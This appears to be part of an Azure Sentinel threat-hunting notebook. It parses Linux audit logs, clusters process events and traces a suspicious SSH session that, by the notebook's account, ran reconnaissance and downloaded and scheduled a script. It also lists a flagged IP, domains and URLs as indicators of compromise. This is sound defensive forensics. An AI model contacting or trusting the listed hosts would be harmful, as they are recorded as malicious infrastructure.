3 31.148.220.53 ipv4 Success 1 {"undetected_urls": [], "undetected_downloaded_samples": [{"date": "2019-03-27 23:53:06", "positives": 0, "total": 67, "sha256": "b56425bd1cdbf0930ff4b3e315cb059ef8c040053453c6ff4609538f843a5d38"}, {"date": "2017-05-26 06:11:46", "positives": 0, "total": 54, "sha256": "60a33e6cf5151f2d52eddae968... 0 IP address in dataset 5 blog.srv-t.pp.ua, drupal.srv-t.pp.ua, ds8610598.clientshostname.com, orgycrazy.com, quickie-chicks.com, sweetgirlsex.com, wafflechicks.com, www.blog.srv-t.pp.ua, www.drupal.srv-t.pp.ua, www.wafflechicks.com http://31.148.220.53/, http://31.148.220.53/login/process.php, http://sweetgirlsex.com/

End of Part 1

We've seen:

  • how to search for IoCs across the different data sets in Azure Sentinel
  • how to use IoCExtract to pull out observables from arbitrary text
  • some of the UI helper widgets, like query time setting and alert display, that help with quickly assembling a useful notebook
  • how to use the GeoIP lookup and mapping tools
  • how to use the VirusTotal lookup to check IPs for known malware origins

In the next part we'll focus on one of the hosts that we already know has been communicating with one of the suspect IPs and see if we can confirm this to be a successful attack or not. We'll then go on to see what we can learn from network traffic recorded in some of the other data sets to see if the attack has spread beyond this single host.

Contents

Part 2 - See What's going on on the Affected Host - Linux


In the next two sections we will examine the host from where the alert originated. In this case it is a Linux host. While we can get some useful information from standard syslog, we have audit logging configured on our hosts to give us detailed process and logon events.

The only tricky part is that the data is not currently in a very friendly format.

This is a good example of using LogAnalytics/Kusto processing combined with some local Python processing to extract data from arbitrary log types.

In [56]:
host1_q_times = nbtools.QueryTime(label='Set time bounds for alert host - at least 1hr either side of the alert',
                           units='hour', max_before=48, before=2, after=1, 
                           max_after=24, origin_time=security_alert.StartTimeUtc)
host1_q_times.display()

Contents

Using Linux Audit data to view processes

In [58]:
# First let's look at the raw log
# Scroll over to look at the RawData column contents
%kql AuditLog_CL | where RawData contains 'EXECVE' | take 3
TenantId SourceSystem MG ManagementGroupName TimeGenerated Computer RawData Type _ResourceId
52b1ab41-869e-4138-9e40-2a4457f09bf0 OpsManager 00000000-0000-0000-0000-000000000002 MSTICAlertsLxVM2 2019-03-24 21:01:10+00:00 MSTICAlertsLxVM2 type=EXECVE msg=audit(1553461201.141:1286673): argc=3 a0="/bin/sh" a1="-c" a2=2E2F51755A59704F62696E732E736820
AuditLog_CL /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.compute/virtualmachines/msticalertslxvm2
52b1ab41-869e-4138-9e40-2a4457f09bf0 OpsManager 00000000-0000-0000-0000-000000000002 MSTICAlertsLxVM2 2019-03-24 21:01:10+00:00 MSTICAlertsLxVM2 type=EXECVE msg=audit(1553461201.145:1286674): argc=3 a0="/bin/sh" a1="-c" a2=5B202D66202F6574632F6B7262352E6B6579746162205D202626205B205C282021202D66202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29202D6F205C28202F6574632F6B7262352E6B6579746162202D6E74202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162205C29205D202626202F6F70742F6F6D692F62696E2F737570706F72742F6B747374726970202F6574632F6B7262352E6B6579746162202F6574632F6F70742F6F6D692F63726564732F6F6D692E6B6579746162203E2F6465762F6E756C6C20323E2631207C7C2074727565
AuditLog_CL /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.compute/virtualmachines/msticalertslxvm2
52b1ab41-869e-4138-9e40-2a4457f09bf0 OpsManager 00000000-0000-0000-0000-000000000002 MSTICAlertsLxVM2 2019-03-24 21:01:10+00:00 MSTICAlertsLxVM2 type=EXECVE msg=audit(1553461201.153:1286680): argc=2 a0="/bin/bash" a1="./QuZYpObins.sh"
AuditLog_CL /subscriptions/40dcc8bf-0478-4f3b-b275-ed0a94f2c013/resourcegroups/asihuntomsworkspacerg/providers/microsoft.compute/virtualmachines/msticalertslxvm2

Done (00:03.118): 3 records

Out[58]:

Linux Audit Logs - To Dos

There are a few things that we need to deal with here:

  • Splitting and unpacking the fields in each rawdata field
  • Some events (like process exec) have multiple rows associated with them - we need to join these together into a single row
  • Some string fields are hex-encoded (this is to allow embedded characters like spaces)
  • We also need to extract the timestamp from the msg field (this is stored as a Unix timestamp float)
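As a quick illustration of the last two items (standard-library only, using values taken from the raw records shown above; the real work below is done by Kusto and msticpy's auditdextract module):

```python
from datetime import datetime, timezone

# a2 from the first EXECVE row above is hex-encoded because it contains a space
arg = bytes.fromhex("2E2F51755A59704F62696E732E736820").decode("utf-8")
print(repr(arg))  # './QuZYpObins.sh '

# msg=audit(1553461201.141:1286673) - the part before ':' is a Unix timestamp
msg_id = "1553461201.141:1286673"
ts = datetime.fromtimestamp(float(msg_id.split(":")[0]), tz=timezone.utc)
print(ts)  # 2019-03-24 21:00:01 UTC - the event time, not the ingest time
```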
In [59]:
# We use Kusto to do as much of the heavy lifting as possible.
# This query splits the rawdata field into message type, message ID, timestamp and message data fields (lines 5 and 6)
# line 7 - get rid of unwanted columns
# line 8 - split the message body into an array of key=value strings
# line 9 - pack the message type and list of contents into a dictionary {'Type': [k1=v1, k2=v2...]}
# line 10 - group by message ID and pack the individual typed_mssg dictionaries into a list of dictionaries

linux_events = r'''
AuditLog_CL
| where Computer has '{hostname}'
| where TimeGenerated >= datetime({start})
| where TimeGenerated <= datetime({end})
| extend mssg_parts = extract_all(@"type=(?P<type>[^\s]+)\s+msg=audit\((?P<mssg_id>[^)]+)\):\s+(?P<mssg>[^\r]+)\r?", dynamic(['type', 'mssg_id', 'mssg']), RawData)
| extend mssg_type = tostring(mssg_parts[0][0]), mssg_id = tostring(mssg_parts[0][1])
| project TenantId, TimeGenerated, Computer, mssg_type, mssg_id, mssg_parts
| extend mssg_content = split(mssg_parts[0][2],' ')
| extend typed_mssg = pack(mssg_type, mssg_content)
| summarize AuditdMessage = makelist(typed_mssg) by TenantId, TimeGenerated, Computer, mssg_id
'''.format(start=host1_q_times.start, end=host1_q_times.end,
           hostname=security_alert.hostname)
print('getting data...')
%kql -query linux_events
linux_events_df = _kql_raw_result_.to_dataframe()
print(f'{len(linux_events_df)} raw auditd mssgs downloaded')
getting data...
17413 raw auditd mssgs downloaded
In [60]:
# Look at a sample of the output
linux_events_df[['Computer', 'TimeGenerated', 'mssg_id', 'AuditdMessage']][0:10]
Out[60]:
Computer TimeGenerated mssg_id AuditdMessage
0 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505627.301:9077922 [{'USER_END': ['pid=28056', 'uid=0', 'auid=4294967295', 'ses=4294967295', 'msg='op=PAM:session_close', 'acct="root"', 'exe="/usr/bin/sudo"', 'hostname=?', 'addr=?', 'terminal=?', 'res=success'']}]
1 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505627.301:9077923 [{'CRED_DISP': ['pid=28056', 'uid=0', 'auid=4294967295', 'ses=4294967295', 'msg='op=PAM:setcred', 'acct="root"', 'exe="/usr/bin/sudo"', 'hostname=?', 'addr=?', 'terminal=?', 'res=success'']}]
2 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.285:9077924 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f396d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28066', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
3 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.289:9077925 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55a693b8bbb8', 'a1=55a693b8bb70', 'a2=55a693b8bb88', 'a3=7f7f05d1b810', 'items=2', 'ppid=28066', 'pid=28067', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
4 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.293:9077926 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749f396d0', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28068', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
5 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505632.293:9077927 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=5650386da7e0', 'a1=5650386da728', 'a2=5650386da7b0', 'a3=7fbb0edc9810', 'items=2', 'ppid=28068', 'pid=28069', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
6 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.305:9077928 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2c870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28070', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
7 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.305:9077929 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55b76ef60bb8', 'a1=55b76ef60b70', 'a2=55b76ef60b88', 'a3=7f0e8609d810', 'items=2', 'ppid=28070', 'pid=28071', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
8 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.309:9077930 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=7f174ea21be8', 'a1=7f1749e2c870', 'a2=7ffcd3946370', 'a3=9', 'items=2', 'ppid=22536', 'pid=28072', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)', 'ses=42949...
9 MSTICAlertsLxVM2 2019-02-18 16:00:00 1550505637.309:9077931 [{'SYSCALL': ['arch=c000003e', 'syscall=59', 'success=yes', 'exit=0', 'a0=55d3f6a4a7e0', 'a1=55d3f6a4a728', 'a2=55d3f6a4a7b0', 'a3=7fd0863a8810', 'items=2', 'ppid=28072', 'pid=28073', 'auid=4294967295', 'uid=0', 'gid=0', 'euid=0', 'suid=0', 'fsuid=0', 'egid=0', 'sgid=0', 'fsgid=0', 'tty=(none)',...
In [61]:
# We still have some work to do using the auditdextract module from msticpy
# This will do:
# - splitting of the key=value strings
# - hex decoding of any encoded strings
# - type conversion for int fields
# - for SYSCALL/EXECVE rows, some extra processing to identify the executable that ran
#   and re-assemble the commandline arguments
# - extracting the real timestamp and replacing the original TimeGenerated column (since this was
#   just the log import time, not the event time, which is what we are after)
from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset
linux_events_all = extract_events_to_df(linux_events_df, verbose=True)
Unpacking auditd messages for 17413 events...
Building output dataframe...
Fixing timestamps...
Complete. 17413 output rows time: 13.280467 sec
In [62]:
# Look at a sample - this isn't very clear. We'll see better below.
linux_events_all[0:5]
Out[62]:
EventType TenantId Computer mssg_id TimeGenerated a0 a1 a2 acct addr argc auid cap_fe cap_fi cap_fp cap_fver cmd cmdline comm cwd egid entries euid exe family gid hostname item msg name nametype old-ses pid ppid proctitle res ses success table terminal tty uid
0 USER_END 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505627.301:9077922 2019-02-18 16:00:27.301 NaN NaN NaN root ? NaN -1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN /usr/bin/sudo NaN NaN ? NaN 'op=PAM:session_close NaN NaN NaN 28056 NaN NaN success' -1 NaN NaN ? NaN 0
1 CRED_DISP 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505627.301:9077923 2019-02-18 16:00:27.301 NaN NaN NaN root ? NaN -1 NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN NaN /usr/bin/sudo NaN NaN ? NaN 'op=PAM:setcred NaN NaN NaN 28056 NaN NaN success' -1 NaN NaN ? NaN 0
2 SYSCALL_EXECVE 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505632.285:9077924 2019-02-18 16:00:32.285 /bin/sh -c iptables --version NaN NaN 3.0 -1 NaN NaN NaN NaN NaN /bin/sh -c iptables --version NaN /var/lib/waagent/WALinuxAgent-2.2.36 0.0 NaN 0.0 /bin/dash NaN 0.0 NaN NaN NaN NaN NaN NaN 28066 22536.0 /bin/sh-ciptables --version NaN -1 yes NaN NaN NaN 0
3 SYSCALL_EXECVE 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505632.289:9077925 2019-02-18 16:00:32.289 iptables --version NaN NaN NaN 2.0 -1 NaN NaN NaN NaN NaN iptables --version NaN /var/lib/waagent/WALinuxAgent-2.2.36 0.0 NaN 0.0 /sbin/xtables-multi NaN 0.0 NaN NaN NaN NaN NaN NaN 28067 28066.0 iptables--version NaN -1 yes NaN NaN NaN 0
4 SYSCALL_EXECVE 52b1ab41-869e-4138-9e40-2a4457f09bf0 MSTICAlertsLxVM2 1550505632.293:9077926 2019-02-18 16:00:32.293 /bin/sh -c iptables -w -t security -C OUTPUT -d 168.63.129.16 -p tcp -m conntrack --ctstate INVALID,NEW -j DROP NaN NaN 3.0 -1 NaN NaN NaN NaN NaN /bin/sh -c iptables -w -t security -C OUTPUT -d 168.63.129.16 -p tcp -m conntrack --ctstate INVALID,NEW -j DROP NaN /var/lib/waagent/WALinuxAgent-2.2.36 0.0 NaN 0.0 /bin/dash NaN 0.0 NaN NaN NaN NaN NaN NaN 28068 22536.0 /bin/sh-ciptables -w -t security -C OUTPUT -d 168.63.129.16 -p tcp -m conntrack --ctstate INVALID,NEW -j DROP NaN -1 yes NaN NaN NaN 0

Contents

Event Types collected

It's useful to get an overview of what events we are dealing with. The graph is dominated by SYSCALL_EXECVE (process exec events). We're displaying on a log scale; otherwise the very low-volume events would be invisible.

In [63]:
sns.set()
(linux_events_all[['EventType', 'TimeGenerated']]
     .groupby('EventType').count().rename(columns={'TimeGenerated': 'EventCount'})
     .sort_values('EventCount', ascending=True)
     .plot.barh(logx=True, figsize=(12,6)));

View events by Type - Process (SYSCALL) and Login events are covered in more detail below. Use this to look at some of the rarer event types and check for anything unusual.

In [64]:
# Let's look at the audit messages by type
from ipywidgets import interactive

# We get the distinct list of event types
items = sorted(linux_events_all['EventType'].unique().tolist())

# this is a nice way of using a Select (list) widget to filter the display
# of the pandas dataframe. The interactive() call below tells the widget
# to call the view function each time an item is selected. The value of the
# item (EventType) is passed to the function and we use it to filter the DataFrame
# before displaying it.
def view(x=''):
    display(linux_events_all[linux_events_all['EventType']==x]
            .drop(['EventType', 'TenantId', 'Computer', 'mssg_id'], axis=1)
            .dropna(axis=1, how='all'))

w = widgets.Select(options=items, description='Select Event Type', **WIDGET_DEFAULTS)
interactive(view, x=w)

Extract Individual Event Types for logon and process events

In [65]:
from msticpy.sectools.auditdextract import extract_events_to_df, get_event_subset
lx_proc_create = get_event_subset(linux_events_all,'SYSCALL_EXECVE')
print(f'{len(lx_proc_create)} Process Create Events')

lx_login = (get_event_subset(linux_events_all, 'LOGIN')
        .merge(get_event_subset(linux_events_all, 'CRED_ACQ'), 
               how='inner',
               left_on=['old-ses', 'pid', 'uid'], 
               right_on=['ses', 'pid', 'uid'],
               suffixes=('', '_cred')).drop(['old-ses','TenantId_cred', 
                                             'Computer_cred'], axis=1)
        .dropna(axis=1, how='all'))
print(f'{len(lx_login)} Login Events')
13046 Process Create Events
269 Login Events

Contents

Failure Events

Failure events can sometimes tell us about attempts to probe around the system that haven't quite worked. Login failures will show up here as well.

In [66]:
lx_fail_events = (linux_events_all[linux_events_all['res'] == "failed'"]
                    .drop(['TenantId', 'mssg_id'], axis=1)
                    .dropna(axis=1, how='all'))
if len(lx_fail_events) > 0:
    display(lx_fail_events)
    add_observation(Observation(caption='Failure events on Linux host.',
                               description='One or more failure events detected on host.',
                               item=lx_fail_events,
                               link='linux_failure_events'))

Contents

Extract IPs from all Events

In [67]:
# Search all events for an addr field containing an IP address (we're looking for any string with a '.').
# Drop duplicates and localhost and return the list
events_with_ips = (linux_events_all[['EventType','addr']]
                   [linux_events_all['addr'].str.contains(r'\.', na=False)]
                   .drop_duplicates())

# Display any events found
display(events_with_ips)
# Get unique IPs and drop localhost
host_ext_ips = list(events_with_ips['addr'].drop_duplicates().to_dict().values())
if '127.0.0.1' in host_ext_ips:
    host_ext_ips.remove('127.0.0.1')
display(host_ext_ips)
EventType addr
5246 USER_ACCT 23.97.60.214
5247 CRED_ACQ 23.97.60.214
6112 USER_START 23.97.60.214
6301 USER_END 23.97.60.214
6302 CRED_DISP 23.97.60.214
['23.97.60.214']

Contents

Get Logins with IP Address Recorded

In [68]:
# From the logon events that we separated out a few cells back
# we can get the full event details of logons with external IPs                  

logins_with_ips = (lx_login[lx_login['addr'] != '?']
                   [['Computer', 'TimeGenerated','pid', 'ses', 
                     'acct', 'addr', 'exe', 'hostname', 'msg',
                     'res_cred', 'ses_cred', 'terminal']])
if len(logins_with_ips) > 0:
    display(logins_with_ips)
    add_observation(Observation(caption='Login events with source Ip addresses',
                                description=f'{len(logins_with_ips)} logins with external addresses',
                                item=logins_with_ips,
                                link='linux_login_ips'))
Computer TimeGenerated pid ses acct addr exe hostname msg res_cred ses_cred terminal
83 MSTICAlertsLxVM2 2019-02-18 15:29:20.115 24851 196045 dbadmin 23.97.60.214 /usr/sbin/sshd 23.97.60.214 'op=PAM:setcred success' -1 ssh

Contents

What's happening in these sessions?

If there are a lot of events here try the Process Clustering section below.

In [69]:
# We can view the processes run by this logon by using the same DataFrame
# filtering trick.
# We don't have massive numbers of events but there is a lot of clutter and 
# it's not immediately obvious that anything bad is happening
items = sorted(lx_login[lx_login['addr'] != '?']['ses'].unique().tolist())

def view(x=''):
    procs = (lx_proc_create[lx_proc_create['ses']==x]
                [['TimeGenerated', 'exe','cmdline', 'pid','cwd']])
    display(Markdown(f'{len(procs)} process events'))
    display(procs)

w = widgets.Select(options=items, description='Select Session', **WIDGET_DEFAULTS)
interactive(view, x=w)

Contents

Find Distinctive Process Patterns - Clustering

We can get rid of a lot of the clutter in the process data by clustering. We'll look at this in more detail in the next part, but it essentially collapses repetitive events into single items, allowing us to focus on distinctive events.
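The idea behind this collapsing can be illustrated with a minimal, self-contained sketch (toy data and toy features, not the msticpy implementation used below): repetitive command lines produce identical feature vectors, so DBSCAN groups them into a single cluster, while rare, distinctive events fall out as noise points.

```python
import numpy as np
from sklearn.cluster import DBSCAN

# 50 copies of a noisy, repetitive event plus one distinctive event (hypothetical data)
cmdlines = ["/usr/bin/cron -f"] * 50 + ["wget http://x.example/a.sh"]

# toy features: token count and character length of each command line
features = np.array([[len(c.split()), len(c)] for c in cmdlines])

labels = DBSCAN(eps=0.5, min_samples=2).fit_predict(features)
# the 50 identical rows share a single cluster label; the rare event is
# labelled -1 (noise), i.e. it survives the collapse as a distinct item
```

msticpy's `dbcluster_events` (used in the next cell) applies the same technique with richer features such as tokenized command lines and path scores.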

In [70]:
# To use the clustering library we're going to cheat
# a little and make the Linux events look a bit more like
# Windows events. This isn't completely necessary but makes
# the code a bit simpler.

lx_to_proc_create = {'acct': 'SubjectUserName',
                     'uid': 'SubjectUserSid',
                     'user': 'SubjectUserName',
                     'ses': 'SubjectLogonId',
                     'pid': 'NewProcessId',
                     'exe': 'NewProcessName',
                     'ppid': 'ProcessId',
                     'cmdline': 'CommandLine',}

# Reverse mapping. Note: 'SubjectUserName' could map back to either 'acct'
# or 'user', but dict keys must be unique, so we keep 'acct' here.
proc_create_to_lx = {'SubjectUserName': 'acct',
                     'SubjectUserSid': 'uid',
                     'SubjectLogonId': 'ses',
                     'NewProcessId': 'pid',
                     'NewProcessName': 'exe',
                     'ProcessId': 'ppid',
                     'CommandLine': 'cmdline',}

lx_to_logon = {'acct': 'SubjectUserName',
               'auid': 'SubjectUserSid',
               'user': 'TargetUserName',
               'uid': 'TargetUserSid',
               'ses': 'TargetLogonId',
               'exe': 'LogonProcessName',
               'terminal': 'LogonType',
               'msg': 'AuthenticationPackageName',
               'res': 'Status',
               'addr': 'IpAddress',
               'hostname': 'WorkstationName',}

logon_to_lx = {'SubjectUserName': 'acct',
               'SubjectUserSid': 'auid',
               'TargetUserName': 'user',
               'TargetUserSid': 'uid',
               'TargetLogonId': 'ses',
               'LogonProcessName': 'exe',
               'LogonType': 'terminal',
               'AuthenticationPackageName': 'msg',
               'Status': 'res',
               'IpAddress': 'addr',
               'WorkstationName': 'hostname',}

lx_proc_create_trans = lx_proc_create.rename(columns=lx_to_proc_create)
lx_login_trans = lx_login.rename(columns=lx_to_logon)
In [71]:
# For demo purposes we're actually running the clustering 
# algorithm against all 13k or so process exec events
# and we can see that it's reduced the unique items to 1%
# of the original volume
print('analyzing data...')
from msticpy.sectools.eventcluster import dbcluster_events, add_process_features

feature_procs_h1 = add_process_features(input_frame=lx_proc_create_trans,
                                        path_separator=security_alert.path_separator)


# you might need to play around with the max_cluster_distance parameter.
# decreasing this gives more clusters.
(clus_events, dbcluster, x_data) = dbcluster_events(data=feature_procs_h1,
                                                    cluster_columns=['commandlineTokensFull', 
                                                                     'pathScore',
                                                                    'SubjectUserSid'],
                                                    time_column='TimeGenerated',
                                                    max_cluster_distance=0.0001)
print('Number of input events:', len(feature_procs_h1))
print('Number of clustered events:', len(clus_events))
(clus_events.sort_values('TimeGenerated')[['TimeGenerated', 'LastEventTime',
                                           'NewProcessName', 'CommandLine', 
                                           'ClusterSize', 'commandlineTokensFull',
                                           'SubjectLogonId', 'SubjectUserSid',
                                           'pathScore', 'isSystemSession']]
    .sort_values('ClusterSize', ascending=True));
analyzing data...
Number of input events: 13046
Number of clustered events: 138
In [72]:
# Lets try viewing our session again
# For interactive sessions the compression won't be as good
# but we've reduced it to about 20% of the original

def view(x=''):
    procs = (clus_events[clus_events['SubjectLogonId']==x]
            [['TimeGenerated', 'NewProcessName','CommandLine', 
              'NewProcessId', 'SubjectUserSid', 'cwd', 'ClusterSize', 'SubjectLogonId']])
    display(Markdown(f'{len(procs)} process events'))
    display(procs)

w = widgets.Select(options=items, description='Select Session to view', **WIDGET_DEFAULTS)
interactive(view, x=w)

Badness Uncovered!

On a single screen we can now scan down the whole session and see pretty quickly some very suspicious activity:

  • Reconnaissance - getting machine info, contents of /etc/passwd and mail
  • Downloading a script and making it executable
  • The crontab command is not entirely clear (likely the start of a pipeline) but it seems a good bet that the script is being installed as a cron job
In [73]:
# Let's save our first piece of real evidence in our summary collection
selected_session = w.value
add_observation(Observation(caption='Suspicious Process Session on Linux Host.',
                            description='Attempt to download and run script + recon cmds.',
                            item = clus_events.query('SubjectLogonId == @selected_session & ClusterSize < 3'),
                            link='linux_proc_cluster'))

Contents

Part 2b - Host Network Data

Get the IP Address of the Source Host

In [74]:
host_entities = [e for e in security_alert.entities if isinstance(e, nbtools.Host)]
if len(host_entities) == 1:
    alert_host_entity = host_entities[0]
    host_name = alert_host_entity.HostName
    resource = alert_host_entity.AzureID
else:
    host_name = None
    alert_host_entity = None
    print('Error: Could not determine host entity from alert. Please type the hostname below')
txt_wgt = widgets.Text(value=host_name, description='Confirm Source Host name:', **WIDGET_DEFAULTS)
display(txt_wgt)
In [75]:
print('Looking for IP addresses of ', txt_wgt.value)
aznet_query = '''
AzureNetworkAnalytics_CL 
| where VirtualMachine_s has \'{host}\'
| where ResourceType == 'NetworkInterface'
| top 1 by TimeGenerated desc
| project PrivateIPAddresses = PrivateIPAddresses_s, 
    PublicIPAddresses = PublicIPAddresses_s
'''.format(host=txt_wgt.value)
%kql -query aznet_query
az_net_df = _kql_raw_result_.to_dataframe()


oms_heartbeat_query = '''
Heartbeat
| where Computer has \'{host}\'
| top 1 by TimeGenerated desc nulls last
| project ComputerIP, OSType, OSMajorVersion, OSMinorVersion, ResourceId, RemoteIPCountry, 
RemoteIPLatitude, RemoteIPLongitude, SourceComputerId
'''.format(host=txt_wgt.value)
%kql -query oms_heartbeat_query
oms_heartbeat_df = _kql_raw_result_.to_dataframe()
display(oms_heartbeat_df[['ComputerIP']])
display(az_net_df)

print('getting data...')
# Get the host entity and add this IP and system info to it
try:
    if not inv_host_entity:
        inv_host_entity = entity.Host()
        inv_host_entity.HostName = host_name
except NameError:
    inv_host_entity = entity.Host()
    inv_host_entity.HostName = host_name

def convert_to_ip_entities(ip_str):
    ip_entities = []
    if ip_str:
        if ',' in ip_str:
            addrs = ip_str.split(',')
        elif ' ' in ip_str:
            addrs = ip_str.split(' ')
        else:
            addrs = [ip_str]
        for addr in addrs:
            ip_entity = entity.IpAddress()
            ip_entity.Address = addr.strip()
            iplocation.lookup_ip(ip_entity=ip_entity)
            ip_entities.append(ip_entity)
    return ip_entities

# Add this information to our inv_host_entity
retrieved_address=[]
if len(az_net_df) == 1:
    priv_addr_str = az_net_df['PrivateIPAddresses'].loc[0]
    inv_host_entity.properties['private_ips'] = convert_to_ip_entities(priv_addr_str)

    pub_addr_str = az_net_df['PublicIPAddresses'].loc[0]
    inv_host_entity.properties['public_ips'] = convert_to_ip_entities(pub_addr_str)
    retrieved_address = [ip.Address for ip in inv_host_entity.properties['public_ips']]
else:
    if 'private_ips' not in inv_host_entity.properties:
        inv_host_entity.properties['private_ips'] = []
    if 'public_ips' not in inv_host_entity.properties:
        inv_host_entity.properties['public_ips'] = []
        
if len(oms_heartbeat_df) == 1:
    if oms_heartbeat_df['ComputerIP'].loc[0]:
        oms_address = oms_heartbeat_df['ComputerIP'].loc[0]
        if oms_address not in retrieved_address:
            ip_entity = entity.IpAddress()
            ip_entity.Address = oms_address
            iplocation.lookup_ip(ip_entity=ip_entity)
            inv_host_entity.properties['public_ips'].append(ip_entity)
        
    inv_host_entity.OSFamily = oms_heartbeat_df['OSType'].loc[0]
    inv_host_entity.AdditionalData['OSMajorVersion'] = oms_heartbeat_df['OSMajorVersion'].loc[0]
    inv_host_entity.AdditionalData['OSMinorVersion'] = oms_heartbeat_df['OSMinorVersion'].loc[0]
    inv_host_entity.AdditionalData['SourceComputerId'] = oms_heartbeat_df['SourceComputerId'].loc[0]

print('Updated Host Entity\n')
print(inv_host_entity)
Looking for IP addresses of  MSTICALERTSLXVM2
ComputerIP
0 104.211.30.1
PrivateIPAddresses PublicIPAddresses
0 10.0.3.4 104.211.30.1
getting data...
Updated Host Entity

{ 'AdditionalData': { 'OSMajorVersion': '18',
                      'OSMinorVersion': '04',
                      'SourceComputerId': '44623fb0-bd5f-49ea-84d1-56aa11ab8a25'},
  'HostName': 'MSTICALERTSLXVM2',
  'OSFamily': 'Linux',
  'Type': 'host',
  'private_ips': [{"Address": "10.0.3.4", "Type": "ipaddress"}],
  'public_ips': [ {"Address": "104.211.30.1", "Location": {"CountryCode": "US", "CountryName": "United States", "State": "Virginia", "City": "Washington", "Longitude": -78.1704, "Latitude": 38.7163, "Type": "geolocation"}, "Type": "ipaddress"}]}

Contents

Check Communications with Other Hosts

In [76]:
# Azure Network Analytics Base Query
az_net_analytics_query =r'''
AzureNetworkAnalytics_CL 
| where SubType_s == 'FlowLog'
| where FlowStartTime_t >= datetime({start})
| where FlowEndTime_t <= datetime({end})
| project TenantId, TimeGenerated, 
    FlowStartTime = FlowStartTime_t, 
    FlowEndTime = FlowEndTime_t, 
    FlowIntervalEndTime = FlowIntervalEndTime_t, 
    FlowType = FlowType_s,
    ResourceGroup = split(VM_s, '/')[0],
    VMName = split(VM_s, '/')[1],
    VMIPAddress = VMIP_s, 
    PublicIPs = extractall(@"([\d\.]+)[|\d]+", dynamic([1]), PublicIPs_s),
    SrcIP = SrcIP_s,
    DestIP = DestIP_s,
    ExtIP = iif(FlowDirection_s == 'I', SrcIP_s, DestIP_s),
    L4Protocol = L4Protocol_s, 
    L7Protocol = L7Protocol_s, 
    DestPort = DestPort_d, 
    FlowDirection = FlowDirection_s,
    AllowedOutFlows = AllowedOutFlows_d, 
    AllowedInFlows = AllowedInFlows_d,
    DeniedInFlows = DeniedInFlows_d, 
    DeniedOutFlows = DeniedOutFlows_d,
    RemoteRegion = AzureRegion_s,
    VMRegion = Region_s
| extend AllExtIPs = iif(isempty(PublicIPs), pack_array(ExtIP), 
                         iif(isempty(ExtIP), PublicIPs, array_concat(PublicIPs, pack_array(ExtIP)))
                         )
| project-away ExtIP
| mvexpand AllExtIPs
{where_clause}
'''

ip_q_times = nbtools.QueryTime(label='Set time bounds for network queries',
                           units='hour', max_before=48, before=10, after=5, 
                           max_after=24, origin_time=security_alert.StartTimeUtc)
ip_q_times.display()
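A side note on the `mvexpand AllExtIPs` step in the query above: it turns the list-valued `AllExtIPs` column into one row per IP. The pandas analogue is `DataFrame.explode`, sketched here on illustrative data:

```python
import pandas as pd

# pandas equivalent of the query's `mvexpand AllExtIPs` step (toy data)
flows = pd.DataFrame({
    "VMName": ["vm1", "vm1"],
    "AllExtIPs": [["13.71.172.130", "13.88.255.115"], ["91.189.94.4"]],
})
expanded = flows.explode("AllExtIPs", ignore_index=True)
# expanded now has 3 rows - one per external IP, VMName repeated as needed
```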

Query Flows by Host IP Addresses

In [77]:
